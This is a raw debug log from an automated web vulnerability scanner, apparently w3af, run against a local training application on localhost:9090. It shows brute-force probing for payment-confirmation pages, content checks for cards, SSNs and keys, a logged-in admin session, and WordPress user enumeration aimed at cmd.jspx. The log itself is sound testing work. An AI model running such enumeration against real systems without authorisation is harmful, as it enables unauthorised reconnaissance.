(id=2236,from_cache=0,grep=1,rtt=0.40,did=gPwAK9HR) [Wed Feb 12 09:40:27 2020 - debug] GET http://localhost:9090/modules/successful.php returned HTTP code "404" (id=2231,from_cache=0,grep=1,rtt=0.55,did=SRsO01jK) [Wed Feb 12 09:40:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:27 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:27 2020 - debug] http_in_body.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.97s to run [Wed Feb 12 09:40:27 2020 - debug] Invalid JSON format returned by Google, response status needs to be 200, got "The Google Web Search API is no longer available. Please migrate to the Google Custom Search API (https://developers.google.com/custom-search/)" instead. [Wed Feb 12 09:40:27 2020 - debug] POST http://localhost:9090/includes/validation.aspx returned HTTP code "404" (id=2234,from_cache=0,grep=1,rtt=0.14,did=I2pqSf6n) [Wed Feb 12 09:40:27 2020 - debug] GET http://localhost:9090/includes/trxcomplete.py returned HTTP code "404" (id=2237,from_cache=0,grep=1,rtt=0.28,did=alIs0B20) [Wed Feb 12 09:40:27 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.83s to run [Wed Feb 12 09:40:27 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.73s to run [Wed Feb 12 09:40:27 2020 - debug] url_session.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.73s to run [Wed Feb 12 09:40:27 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 152. [Wed Feb 12 09:40:27 2020 - debug] POST http://localhost:9090/servlet/paymentsuccess.asp returned HTTP code "404" (id=2228,from_cache=0,grep=1,rtt=0.04,did=spBwvbHg) [Wed Feb 12 09:40:27 2020 - debug] localhost:9090 connection pool stats (free:48 / in_use:6 / max:50 / total:54) [Wed Feb 12 09:40:27 2020 - debug] Connections with more in use time: (a5419411797e137e, 0.40 sec) (62e87e81607155f6, 0.15 sec) (feefb3b1646a9d56, 0.15 sec) (084f56a9dda1c119, 0.14 sec) (20c6fb7a85d275d0, 0.10 sec) [Wed Feb 12 09:40:27 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/localhost.tar.gz") took 1.02s to run [Wed Feb 12 09:40:27 2020 - debug] html_comments.grep(uri="http://localhost:9090/localhost.tar.gz") took 0.89s to run [Wed Feb 12 09:40:28 2020 - debug] GET http://localhost:9090/modules/pay.cgi returned HTTP code "404" (id=2233,from_cache=0,grep=1,rtt=0.33,did=Nx6xkCdb) [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/localhost.tar.gz") took 1.03s to run [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] POST http://localhost:9090/module/paid.pl returned HTTP code "404" (id=2238,from_cache=0,grep=1,rtt=0.53,did=nTjKAE0q) [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:28 2020 - debug] GET http://localhost:9090/libraries/pay.php returned HTTP code "404" (id=2241,from_cache=0,grep=1,rtt=0.19,did=m4BLx72U) [Wed Feb 12 09:40:29 2020 - debug] GET http://localhost:9090/includes/finished.php returned HTTP code "404" (id=2242,from_cache=0,grep=1,rtt=0.63,did=vdD2MKHh) [Wed Feb 12 09:40:29 2020 - debug] POST http://localhost:9090/module/return.jsp returned HTTP code "404" (id=2235,from_cache=0,grep=1,rtt=0.03,did=wzjZ8CPq) [Wed Feb 12 09:40:29 2020 - debug] symfony.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:29 2020 - debug] motw.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:29 2020 - debug] meta_generator.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:29 2020 - debug] retirejs.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:29 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:29 2020 - debug] POST http://localhost:9090/modules/paymentsuccessful.aspx returned HTTP code "404" (id=2239,from_cache=0,grep=1,rtt=0.16,did=jYLGwjVp) [Wed Feb 12 09:40:29 2020 - debug] GET http://localhost:9090/servlet/paymentsuccessful.py returned HTTP code "404" (id=2250,from_cache=0,grep=1,rtt=0.20,did=3AlDCdze) [Wed Feb 12 09:40:29 2020 - debug] GET http://localhost:9090/inc/validation.aspx returned HTTP code "404" (id=2246,from_cache=0,grep=1,rtt=0.16,did=p4iyardh) [Wed Feb 12 09:40:29 2020 - debug] GET http://localhost:9090/inc/return.php3 returned HTTP code "404" (id=2256,from_cache=0,grep=1,rtt=0.23,did=ROdMFhqt) [Wed Feb 12 09:40:29 2020 - debug] POST http://localhost:9090/inc/final.jsp returned HTTP code "404" (id=2253,from_cache=0,grep=1,rtt=0.10,did=mnQzKys5) [Wed Feb 12 09:40:30 2020 - debug] GET http://localhost:9090/includes/paymentcomplete.php5 returned HTTP code "404" (id=2257,from_cache=0,grep=1,rtt=0.21,did=TDqnxe2R) [Wed Feb 12 09:40:30 2020 - debug] GET http://localhost:9090/inc/trxcomplete.aspx returned HTTP code "404" (id=2261,from_cache=0,grep=1,rtt=0.06,did=8tKXgQZD) [Wed Feb 12 09:40:30 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 992, 'reject-seen-url': 826, 'reject-out-of-scope': 24, 'accept': 208} [Wed Feb 12 09:40:30 2020 - debug] POST http://localhost:9090/includes/validatepayment.pl returned HTTP code "404" (id=2244,from_cache=0,grep=1,rtt=0.21,did=ZXGQJ2eZ) [Wed Feb 12 09:40:30 2020 - debug] GET http://localhost:9090/modules/completepayment.py returned HTTP code "404" (id=2245,from_cache=0,grep=1,rtt=0.29,did=33IdFwJP) [Wed Feb 12 09:40:30 2020 - debug] svn_users.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:30 2020 - debug] GET http://localhost:9090/inc/validatepay.php5 returned HTTP code "404" (id=2251,from_cache=0,grep=1,rtt=0.22,did=h1SKfG4u) [Wed Feb 12 09:40:30 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:30 2020 - debug] GET http://localhost:9090/inc/completepay.py returned HTTP code "404" (id=2255,from_cache=0,grep=1,rtt=0.55,did=1a0Rhcbc) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/includes/trxcomplete.jsp returned HTTP code "404" (id=2260,from_cache=0,grep=1,rtt=0.15,did=Mhu1luTk) [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/inc/validate.asp returned HTTP code "404" (id=2265,from_cache=0,grep=1,rtt=0.33,did=n73qubiq) [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/servlet/successful.py returned HTTP code "404" (id=2259,from_cache=0,grep=1,rtt=0.18,did=CAfmNAdg) [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/learn/vulnerability/a1_injection returned HTTP code "200" (id=2240,from_cache=0,grep=0,rtt=0.47,did=n1fQt73r) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/includes/complete.jsp returned HTTP code "404" (id=2243,from_cache=0,grep=1,rtt=0.50,did=m9i8f4Gh) [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/servlet/validate.aspx returned HTTP code "404" (id=2249,from_cache=0,grep=1,rtt=0.12,did=AKJotrel) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/servlet/final.cgi returned HTTP code "404" (id=2247,from_cache=0,grep=1,rtt=0.13,did=NSRkrcMM) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/modules/successful.aspx returned HTTP code "404" (id=2258,from_cache=0,grep=1,rtt=0.09,did=7yK7vxXD) [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/includes/validatepay.asp returned HTTP code "404" (id=2254,from_cache=0,grep=1,rtt=0.50,did=iInUPgUQ) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/module/valid.asp returned HTTP code "404" (id=2248,from_cache=0,grep=1,rtt=0.24,did=g68b4cDy) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/module/validpay.pl returned HTTP code "404" (id=2264,from_cache=0,grep=1,rtt=0.34,did=PVWEHevh) [Wed Feb 12 09:40:31 2020 - debug] POST http://localhost:9090/modules/paymentsuccess.aspx returned HTTP code "404" (id=2252,from_cache=0,grep=1,rtt=0.07,did=oLzvMEAK) [Wed Feb 12 09:40:31 2020 - debug] private_ip.grep(uri="http://localhost:9090/~ftp/") took 0.13s to run [Wed Feb 12 09:40:31 2020 - debug] blank_body.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] credit_cards.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] websockets_links.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] csp.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] dom_xss.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] vulners_db.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] file_upload.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] [auth.detailed] User "admin" is currently logged into the application (did: n1fQt73r) [Wed Feb 12 09:40:31 2020 - debug] detailed._login() took 2.02s to run [Wed Feb 12 09:40:31 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] GET http://localhost:9090/module/success.asp returned HTTP code "404" (id=2263,from_cache=0,grep=1,rtt=0.46,did=kJFBMZC6) [Wed Feb 12 09:40:31 2020 - debug] serialized_object.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] Updating socket timeout for localhost from 3.00 to 3.00 seconds [Wed Feb 12 09:40:31 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:31 2020 - debug] expect_ct.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] POST http://localhost:9090/modules/payment.jsp returned HTTP code "404" (id=2262,from_cache=0,grep=1,rtt=0.26,did=ok3LiMzJ) [Wed Feb 12 09:40:32 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] POST http://localhost:9090/modules/pay.asp returned HTTP code "404" (id=2267,from_cache=0,grep=1,rtt=0.19,did=w2PPeo3A) [Wed Feb 12 09:40:32 2020 - debug] POST http://localhost:9090/libraries/pay.aspx returned HTTP code "404" (id=2268,from_cache=0,grep=1,rtt=0.04,did=S2u4Xc6s) [Wed Feb 12 09:40:32 2020 - debug] keys.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] GET http://localhost:9090/servlet/completepay.pl returned HTTP code "404" (id=2269,from_cache=0,grep=1,rtt=0.04,did=ETa5iFan) [Wed Feb 12 09:40:32 2020 - debug] localhost:9090 connection pool stats (free:49 / in_use:2 / max:50 / total:51) [Wed Feb 12 09:40:32 2020 - debug] Connections with more in use time: (084f56a9dda1c119, 0.07 sec) (62e87e81607155f6, 0.04 sec) (20c6fb7a85d275d0, 0.03 sec) [Wed Feb 12 09:40:32 2020 - debug] POST http://localhost:9090/includes/finished.aspx returned HTTP code "404" (id=2266,from_cache=0,grep=1,rtt=0.11,did=Y1IoG7Nu) [Wed Feb 12 09:40:32 2020 - debug] clamav.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] objects.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] error_500.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] meta_tags.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] password_profiling.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] click_jacking.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] lang.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] http_in_body.grep(uri="http://localhost:9090/~ftp/") took 0.44s to run [Wed Feb 12 09:40:32 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/~ftp/") took 0.45s to run [Wed Feb 12 09:40:32 2020 - debug] strange_reason.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] cache_control.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] strange_headers.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] ssn.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] oracle.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] feeds.grep(uri="http://localhost:9090/~ftp/") took 0.00s to run [Wed Feb 12 09:40:32 2020 - debug] url_session.grep(uri="http://localhost:9090/~ftp/") took 0.17s to run [Wed Feb 12 09:40:32 2020 - debug] html_comments.grep(uri="http://localhost:9090/~ftp/") took 0.36s to run [Wed Feb 12 09:40:32 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/~ftp/") took 0.38s to run [Wed Feb 12 09:40:32 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/~ftp/") took 0.26s to run [Wed Feb 12 09:40:32 2020 - debug] GET http://localhost:9090/includes/validation.aspx returned HTTP code "404" (id=2270,from_cache=0,grep=1,rtt=0.16,did=hkKanG3P) [Wed Feb 12 09:40:32 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/~ftp/") took 0.39s to run [Wed Feb 12 09:40:32 2020 - debug] error_pages.grep(uri="http://localhost:9090/~ftp/") took 0.13s to run [Wed Feb 12 09:40:32 2020 - debug] CachedQueue.get() from GrepIn DiskDict was used to read an item from disk. The current GrepIn DiskDict size is 151. [Wed Feb 12 09:40:32 2020 - debug] analyze_cookies.grep(uri="http://localhost:9090/~ftp/") took 0.14s to run [Wed Feb 12 09:40:32 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] POST http://localhost:9090/includes/paymentcomplete.php returned HTTP code "404" (id=2274,from_cache=0,grep=1,rtt=0.15,did=Rw9BZPSJ) [Wed Feb 12 09:40:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1004, 'reject-seen-url': 838, 'reject-out-of-scope': 24, 'accept': 209} [Wed Feb 12 09:40:33 2020 - debug] POST http://localhost:9090/inc/validate.py returned HTTP code "404" (id=2275,from_cache=0,grep=1,rtt=0.19,did=7jR739bF) [Wed Feb 12 09:40:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1004, 'reject-seen-url': 838, 'reject-out-of-scope': 24, 'accept': 209} [Wed Feb 12 09:40:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] GET http://localhost:9090/module/paid.pl returned HTTP code "404" (id=2271,from_cache=0,grep=1,rtt=0.16,did=GPiHfulG) [Wed Feb 12 09:40:33 2020 - debug] Grep consumer should_grep() stats: {'reject-seen-body': 1004, 'reject-seen-url': 838, 'reject-out-of-scope': 24, 'accept': 209} [Wed Feb 12 09:40:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] GET http://localhost:9090/servlet/paymentsuccess.asp returned HTTP code "404" (id=2272,from_cache=0,grep=1,rtt=0.11,did=W2sMVd0H) [Wed Feb 12 09:40:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:33 2020 - debug] POST http://localhost:9090/modules/completepayment.jsp returned HTTP code "404" (id=2273,from_cache=0,grep=1,rtt=0.15,did=8W5v4kkb) [Wed Feb 12 09:40:33 2020 - debug] localhost:9090 connection pool stats (free:43 / in_use:7 / max:50 / total:50) [Wed Feb 12 09:40:33 2020 - debug] POST http://localhost:9090/module/success.py returned HTTP code "404" (id=2276,from_cache=0,grep=1,rtt=0.21,did=4SeZmZah) [Wed Feb 12 09:40:33 2020 - debug] POST http://localhost:9090/servlet/paymentsuccessful.jsp returned HTTP code "404" (id=2277,from_cache=0,grep=1,rtt=0.33,did=V6VBI2u6) [Wed Feb 12 09:40:33 2020 - debug] get_emails.grep(uri="http://localhost:9090/localhost.tar.gz") took 3.00s to run [Wed Feb 12 09:40:33 2020 - debug] Connections with more in use time: (084f56a9dda1c119, 0.32 sec) (62e87e81607155f6, 0.21 sec) (ff37903b27d7f8f9, 0.18 sec) (20c6fb7a85d275d0, 0.17 sec) (b6d2213d6ce83030, 0.17 sec) [Wed Feb 12 09:40:34 2020 - debug] GET http://localhost:9090/module/return.jsp returned HTTP code "404" (id=2279,from_cache=0,grep=1,rtt=0.10,did=jVPurtQC) [Wed Feb 12 09:40:34 2020 - debug] GET http://localhost:9090/includes/trxcomplete.jsp returned HTTP code "404" (id=2284,from_cache=0,grep=1,rtt=0.15,did=DIb0Igz9) [Wed Feb 12 09:40:34 2020 - debug] POST http://localhost:9090/inc/validation.pl returned HTTP code "404" (id=2287,from_cache=0,grep=1,rtt=0.21,did=FN6GpsQI) [Wed Feb 12 09:40:34 2020 - debug] POST http://localhost:9090/servlet/validate.pl returned HTTP code "404" (id=2292,from_cache=0,grep=1,rtt=0.24,did=WmN8TzHy) [Wed Feb 12 09:40:34 2020 - debug] POST http://localhost:9090/inc/trxcomplete.pl returned HTTP code "404" (id=2282,from_cache=0,grep=1,rtt=0.22,did=awm5a4Jt) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/servlet/successful.jsp returned HTTP code "404" (id=2280,from_cache=0,grep=1,rtt=0.23,did=sZRi2bys) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/modules/paymentsuccess.aspx returned HTTP code "404" (id=2283,from_cache=0,grep=1,rtt=0.14,did=Vc5Buh2g) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/includes/validation.pl returned HTTP code "404" (id=2289,from_cache=0,grep=1,rtt=0.10,did=UDmlCfjL) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/includes/validatepayment.pl returned HTTP code "404" (id=2294,from_cache=0,grep=1,rtt=0.25,did=GRy9ASms) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/modules/payment.jsp returned HTTP code "404" (id=2295,from_cache=0,grep=1,rtt=0.26,did=vgeF9u9F) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/modules/successful.aspx returned HTTP code "404" (id=2297,from_cache=0,grep=1,rtt=0.41,did=SnpskSJa) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/module/valid.asp returned HTTP code "404" (id=2281,from_cache=0,grep=1,rtt=0.14,did=vdSPkpGB) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/inc/completepay.jsp returned HTTP code "404" (id=2278,from_cache=0,grep=1,rtt=0.10,did=gDdCvDZK) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/inc/complete returned HTTP code "404" (id=2288,from_cache=0,grep=1,rtt=0.29,did=GMcUWVtC) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/module/paid.php3 returned HTTP code "404" (id=2296,from_cache=0,grep=1,rtt=0.20,did=6g5KWc9h) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/servlet/final.cgi returned HTTP code "404" (id=2290,from_cache=0,grep=1,rtt=0.36,did=O7Up3ApQ) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/includes/validatepay.py returned HTTP code "404" (id=2291,from_cache=0,grep=1,rtt=0.53,did=q7MHpiSu) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/servlet/completepay.php3 returned HTTP code "404" (id=2286,from_cache=0,grep=1,rtt=0.20,did=KErUSZEQ) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/module/validpay.pl returned HTTP code "404" (id=2285,from_cache=0,grep=1,rtt=0.06,did=qWb9l2Qq) [Wed Feb 12 09:40:35 2020 - debug] GET http://localhost:9090/modules/paymentsuccessful.aspx returned HTTP code "404" (id=2298,from_cache=0,grep=1,rtt=0.07,did=F5E89Hj1) [Wed Feb 12 09:40:35 2020 - debug] POST http://localhost:9090/inc/validatepay.php returned HTTP code "404" (id=2299,from_cache=0,grep=1,rtt=0.27,did=j76Qm2T2) [Wed Feb 12 09:40:35 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:36 2020 - debug] GET http://localhost:9090/inc/final.jsp returned HTTP code "404" (id=2293,from_cache=0,grep=1,rtt=0.33,did=l2YKx0ss) [Wed Feb 12 09:40:36 2020 - debug] The framework has 117 active threads. [Wed Feb 12 09:40:36 2020 - debug] symfony.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] file_upload.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] expect_ct.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] svn_users.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] private_ip.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] motw.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] meta_generator.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] retirejs.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:40:36 2020 - debug] serialized_object.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] blank_body.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] credit_cards.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] websockets_links.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] csp.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] dom_xss.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] vulners_db.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] keys.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] clamav.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] objects.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] error_500.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] meta_tags.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] password_profiling.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] click_jacking.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] lang.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] payment_webhook_finder.discover(did="vxUqJJpP",uri="http://localhost:9090/cmd.jspx") took 77.25s to run [Wed Feb 12 09:40:36 2020 - debug] hash_analysis.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:36 2020 - debug] wordpress_enumerate_users.discover(http://localhost:9090/cmd.jspx, did=gKTeg7sf) [Wed Feb 12 09:40:36 2020 - debug] [wordpress_enumerate_users] Crawling "http://localhost:9090/cmd.jspx" [Wed Feb 12 09:40:36 2020 - debug] Connection has been in "free_conns" for more than 120.00 seconds, forcefully closing it [Wed Feb 12 09:40:36 2020 - debug] localhost:9090 connection pool stats (free:42 / in_use:8 / max:50 / total:50) [Wed Feb 12 09:40:36 2020 - debug] Connections with more in use time: (ff37903b27d7f8f9, 0.42 sec) (62e87e81607155f6, 0.22 sec) (084f56a9dda1c119, 0.20 sec) (a5419411797e137e, 0.18 sec) (b6d2213d6ce83030, 0.15 sec) [Wed Feb 12 09:40:36 2020 - debug] error_pages.grep(uri="http://localhost:9090/localhost.gzip") took 0.30s to run [Wed Feb 12 09:40:36 2020 - debug] strange_reason.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] content_sniffing.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] user_defined_regex.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] cache_control.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] strange_headers.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] ssn.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] oracle.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:36 2020 - debug] feeds.grep(uri="http://localhost:9090/localhost.gzip") took 0.00s to run [Wed Feb 12 09:40:37 2020 - debug] POST http://localhost:9090/includes/validatepayment.php3 returned HTTP code "404" (id=2308,from_cache=0,grep=1,rtt=0.27,did=HFZwP1gw) 